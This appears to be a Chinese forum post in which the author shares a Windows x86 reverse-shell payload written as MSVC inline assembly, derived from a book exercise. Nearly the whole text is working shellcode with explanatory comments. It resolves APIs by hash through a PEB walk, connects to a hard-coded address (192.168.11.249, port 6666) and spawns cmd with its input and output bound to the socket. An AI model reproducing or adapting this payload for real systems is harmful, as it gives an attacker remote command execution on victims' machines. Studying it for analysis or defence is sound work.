一直在看0day的那本书，受益匪浅，并根据bindshell那个，自己写了个reverse_bind的反弹端口，留着也没用，分享出来大家一起学习，写得比较啰嗦，请大家指正
#include "stdafx.h"
///
/// by:xiaoyu 2015 9/11
/// reverse_shell for win 7 and win 8
///
void main()
{
// ---------------------------------------------------------------------
// Windows x86 reverse-shell payload written as MSVC inline assembly
// (book exercise derived from a bind-shell sample; see header above).
//
// What this block visibly does, in order:
//   1. pushes seven 32-bit API-name hashes (ws2_32 first, kernel32 last),
//   2. finds kernel32.dll through the PEB loader list (fs:[0x30]),
//   3. resolves each hash by walking the PE export table, loading
//      ws2_32.dll via LoadLibraryA when its first hash is reached,
//   4. WSAStartup / WSASocketA / inet_addr / connect to a hard-coded
//      private address (192.168.11.249; sockaddr word 0x0a1a0002
//      decodes to AF_INET, port 0x1a0a = 6666 in network order),
//   5. CreateProcessA("cmd") with the socket as stdin/stdout/stderr,
//      then ExitProcess.
//
// Analyst notes: the recognisable artifacts are the fs:[0x30] PEB walk,
// the ror-7/add name hash, stack-built strings ("ws2_32", "cmd", the
// dotted IP) and a CreateProcessA with bInheritHandles=1 whose
// STARTUPINFO std handles are a socket. No API return value is checked.
//
// Register roles (as far as this listing shows):
//   esi = cursor over the hash table (lodsd advances it)
//   edi = cursor over the resolved-address table that starts 0x1c bytes
//         below the hashes; addresses are later read as [edi-N]/[esi-N]
//   ebp = module base during resolution, afterwards the socket handle
// ---------------------------------------------------------------------
__asm
{
cld //lodsd/stosd must walk upward through memory
//hash table: one 32-bit name hash per import, resolved in pop order
push 0x630a7771 //inet_addr (last to be resolved; see the loop exit test)
push 0xc0577762 //connect
push 0xde78322d //WSASocket
push 0x80b46a3d //WSAStartup (first ws2_32 hash met: triggers LoadLibraryA)
//---------------------ws2_32.dll hash
push 0x6ba6bcc9 //createProcessA
push 0x4fd18963 //ExitProcess
push 0x0c917432 //LoadLibraryA (resolved first -> address slot 0)
//-----------------------kernel32.dll hash
mov esi,esp //esi -> most recently pushed hash (LoadLibraryA)
lea edi,[esi - 0x1c] //edi -> 7-dword slot area below the hashes for resolved addresses
//make some stack space(500h)
xor ebx,ebx
mov bh,0x05 //ebx = 0x500
sub esp,ebx
mov bx,0x3233 //"32" followed by two NUL bytes (ebx = 0x00003233)
push ebx
push 0x5F327377 //"ws2_" -> the stack now holds "ws2_32\0"
push esp //pointer to "ws2_32"; nothing else is pushed before the LoadLibraryA call below consumes it
xor edx,edx
//get the base of kernel32.dll
mov ebx,fs:[edx+0x30] //TEB -> PEB
mov ecx,[ebx + 0x0c] //PEB -> Ldr
mov ecx,[ecx + 0x1c] //Ldr -> InInitializationOrderModuleList, first entry
mov ecx,[ecx] //next entry (kernelbase.dll per the author; list order is OS-version dependent)
mov ecx,[ecx] //next entry (kernel32.dll on Win7/8 per the author)
mov ebp,[ecx+0x08] //DllBase field relative to the init-order link = kernel32 base
find_lib_functions:
lodsd //eax = next hash, esi += 4
cmp eax,0x80b46a3d //reached the first ws2_32 hash (WSAStartup)?
jne find_functions
xchg eax,ebp //park the kernel32 base in eax, keep the hash in ebp
call [edi - 0x0c] //LoadLibraryA("ws2_32"): slot 0 of the address table, edi is three slots in by now
xchg eax,ebp //ebp = ws2_32 base, eax = the hash again
find_functions:
pushad //saved eax (the hash being searched) lands at [esp+0x1c]
mov eax,[ebp+0x3c] //e_lfanew
mov ecx,[ebp+eax+0x78] //export directory RVA
add ecx,ebp //ecx = &IMAGE_EXPORT_DIRECTORY
mov ebx,[ecx+0x20] //AddressOfNames RVA
add ebx,ebp
xor edi,edi //name index
next_function_loop:
inc edi
mov esi,[ebx+edi*4] //RVA of name[edi]
add esi,ebp //esi -> exported name string
cdq //edx = 0 (eax still holds the small positive e_lfanew); edx is the hash accumulator
//compute hash
hash_loop:
movsx eax,byte ptr[esi] //next name byte; ah stays 0 for 7-bit ASCII names
cmp al,ah //NUL terminator reached?
jz compare_hash
ror edx,7
add edx,eax //hash = ror(hash, 7) + byte
inc esi
jmp hash_loop
compare_hash:
cmp edx,[esp+0x1c] //against the hash saved by pushad
jnz next_function_loop
mov ebx,[ecx+0x24] //AddressOfNameOrdinals RVA
add ebx,ebp
mov di,[ebx+2*edi] //16-bit ordinal for that name
mov ebx,[ecx+0x1c] //AddressOfFunctions RVA
add ebx,ebp
add ebp,[ebx +4*edi] //ebp = module base + function RVA = absolute address
xchg eax,ebp //eax = resolved address, ebp = module base
pop edi //take the live table cursor out of the pushad frame
stosd //store the address, cursor += 4
push edi //write the advanced cursor back into the frame...
popad //...so popad keeps it while restoring everything else
cmp eax,0x630a7771 //inet_addr was pushed first, so it is the last hash read
jne find_lib_functions
function_call: //function module(vip)
//--------------------------------------------------wsastartup(dword,lpwsadata)
push esp //lpWSAData: points into the reserved stack area
push 0x02 //wVersionRequested = 2
call [edi-0x10] //WSAStartup; edi is back at the hash base, so slot 3; eax = 0 on success
//-------------------------------------------------WSASocketA(af,type ...)
//clean stack to 0
mov ecx,0x50 //0x50 dwords
mov edi,esp
rep stosd //fills with eax (0 after a successful WSAStartup); presumably the unpushed WSASocketA args are read from here
//create socket
inc eax //eax = 1
push eax //type = SOCK_STREAM (1)
inc eax
push eax //af = AF_INET (2)
call [esi-0x28] //WSASocketA; esi sits 0x1c above the hash base, so slot 4
xchg ebp,eax // ebp = socket handle
add esp,0x20
push 0x00003934 //"49\0\0" -> "192.168.11.249" assembled bottom-up on the stack
push 0x322e3131 //"11.2"
push 0x2e383631 //"168."
push 0x2e323931 //"192."
push esp //pointer to the dotted string
call [esi-0x20] //inet_addr -> eax = address in network byte order
add esp,0x20
push eax //sin_addr
push 0x0a1a0002 //sin_family = AF_INET (2), sin_port = 0x1a0a network order
mov ecx,esp //ecx = &sockaddr_in
push 0x10 //namelen = sizeof(sockaddr_in)
push ecx
push ebp //socket
call [esi-0x24] //connect
//clean stack to 0
xor eax,eax
mov ecx,0x50
rep stosd //zero 0x50 more dwords, continuing from where the previous fill stopped (edi)
//init startinfo
mov esp,edi //move esp to the top of the zeroed area; STARTUPINFO / PROCESS_INFORMATION are built below it
push ebp //hStdError = socket
push ebp //hStdOutput = socket
push ebp //hStdInput = socket
sub esp,0x8 //wShowWindow/cbReserved2/lpReserved2 (left zero)
push 0x100 //dwFlags = STARTF_USESTDHANDLES
mov [esp-0x2c],0x44 //cb = sizeof(STARTUPINFOA) in the struct's first dword
sub esp,0x2c //esp = &STARTUPINFO
mov ecx,esp //ecx = lpStartupInfo
sub esp,0x10 //PROCESS_INFORMATION (4 dwords)
mov eax,esp //eax = lpProcessInformation
push 0x00646d63 //"cmd\0"
mov edi,esp //edi = lpCommandLine
//createprocess
push eax //lpProcessInformation
push ecx //lpStartupInfo
push 0 //lpCurrentDirectory
push 0 //lpEnvironment
push 0 //dwCreationFlags
push 1 //bInheritHandles = TRUE, so the std handles above pass to cmd
push 0 //lpThreadAttributes
push 0 //lpProcessAttributes
push edi //lpCommandLine = "cmd"
push 0 //lpApplicationName
call [esi-0x30] //createprocess
call [esi-0x34] //ExitProcess: does not return, so the C return below is never reached
}
return;
}